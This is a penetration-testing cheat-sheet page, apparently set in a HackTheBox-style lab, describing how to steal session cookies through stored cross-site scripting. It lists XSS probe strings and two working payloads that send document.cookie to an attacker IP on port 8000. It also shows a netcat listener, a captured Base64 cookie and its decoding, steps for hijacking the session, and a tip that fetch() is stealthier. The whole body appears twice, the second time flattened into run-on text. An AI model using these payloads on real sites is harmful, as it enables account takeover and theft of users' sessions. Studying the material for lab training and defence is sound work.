OBTAINING SESSION COOKIES (NETCAT SERVER)

#discovery
root@oco:~$ BROWSER > {targetSite:port}
 input field 1: "><img src=x onerror=prompt(document.domain)>
 input field 2: "><img src=x onerror=confirm(1)>
 input field 3: "><img src=x onerror=alert(1)>

 * this will identify which field is vulnerable to XSS
 
 *  the document.domain is used to ensure that JavaScript is being executed on the 
    actual domain and not in a sandboxed environment. 
     - JavaScript being executed in a sandboxed environment prevents client-side 
       attacks, but there are sandbox escapes exists
       
 * if no automatic triggers occur, utilize the site/page button to trigger them
 
#check if HTTPOnly is "off" using Web Developer Tools
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > {targetSite}
 HttpOnly: False
 Secure: False
 SameSite: None

root@oco:~$ BROWSER > {targetSite:port}
 vulnerable xss input field: <style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video>
 
 * We don't necessarily have to use the window.location() object that causes victims 
   to get redirected. We can use fetch(), which can fetch data (cookies) and send 
   it to our server without any redirects. This is a stealthier way.
 
 * another sample payload: <h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1>
 
root@oco:~$ nc -nlvp 8000
 listening on [any] 8000 ...

#expected victim actions
root@target:~$ BROWSER > New Private Window > {targetSite:port}
 * log in to the application 
 
root@target:~$ BROWSER > http://xss.htb.net/profile?email=ela.stienen@example.com
 * view the public profile
    - this is the attacker-crafted public profile that hosts our cookie-stealing payload
    - this is an attacker-controlled public profile hosting a cookie-stealing payload leveraging the stored XSS vulnerability

 * the time the target hover over the "test" link, the script will trigger and send the target's cookie data to the attacker's server

root@oco:~$ netcat...
 listening on [any] 8000 ...
 connect to [10.10.14.36] from (UNKNOWN) [10.10.14.36] 37106
 GET /?cookie=YXV0aC1zZXNzaW9...
 
 * the cookie is in a Base64 value because of the btoa() function which base64 encodes the cookie's value
 
#decode
root@oco:~$ BROWSER > {anySite} > F12 > Console
 input: atob("YXV0aC1zZXNzaW9...") 
 output: auth-session=s%3AQZOROUpdXhN0
 
root@oco:~$ BROWSER > New Private Windows > {targetSite:port} > F12 > Storage > Cookies > {targetFQDN}
 Name: {auth-session}
 Value: {cookieValue}
 
 * refresh the target page to execute

PreviousOBTAINING SESSION COOKIES (PHP SERVER)NextSQL INJECTION (SQLI)

Last updated 1 month ago

#discovery root@oco:~$ BROWSER > {targetSite:port} input field 1: "><img src=x onerror=prompt(document.domain)> input field 2: "><img src=x onerror=confirm(1)> input field 3: "><img src=x onerror=alert(1)> * this will identify which field is vulnerable to XSS * the document.domain is used to ensure that JavaScript is being executed on the actual domain and not in a sandboxed environment. - JavaScript being executed in a sandboxed environment prevents client-side attacks, but there are sandbox escapes exists * if no automatic triggers occur, utilize the site/page button to trigger them #check if HTTPOnly is "off" using Web Developer Tools root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > {targetSite} HttpOnly: False Secure: False SameSite: None

root@oco:~$ BROWSER > {targetSite:port} vulnerable xss input field: <style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video> * We don't necessarily have to use the window.location() object that causes victims to get redirected. We can use fetch(), which can fetch data (cookies) and send it to our server without any redirects. This is a stealthier way. * another sample payload: <h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1> root@oco:~$ nc -nlvp 8000 listening on [any] 8000 ...

#expected victim actions root@target:~$ BROWSER > New Private Window > {targetSite:port} * log in to the application root@target:~$ BROWSER > http://xss.htb.net/profile?email=ela.stienen@example.com * view the public profile - this is the attacker-crafted public profile that hosts our cookie-stealing payload - this is an attacker-controlled public profile hosting a cookie-stealing payload leveraging the stored XSS vulnerability * the time the target hover over the "test" link, the script will trigger and send the target's cookie data to the attacker's server root@oco:~$ netcat... listening on [any] 8000 ... connect to [10.10.14.36] from (UNKNOWN) [10.10.14.36] 37106 GET /?cookie=YXV0aC1zZXNzaW9... * the cookie is in a Base64 value because of the btoa() function which base64 encodes the cookie's value #decode root@oco:~$ BROWSER > {anySite} > F12 > Console input: atob("YXV0aC1zZXNzaW9...") output: auth-session=s%3AQZOROUpdXhN0 root@oco:~$ BROWSER > New Private Windows > {targetSite:port} > F12 > Storage > Cookies > {targetFQDN} Name: {auth-session} Value: {cookieValue} * refresh the target page to execute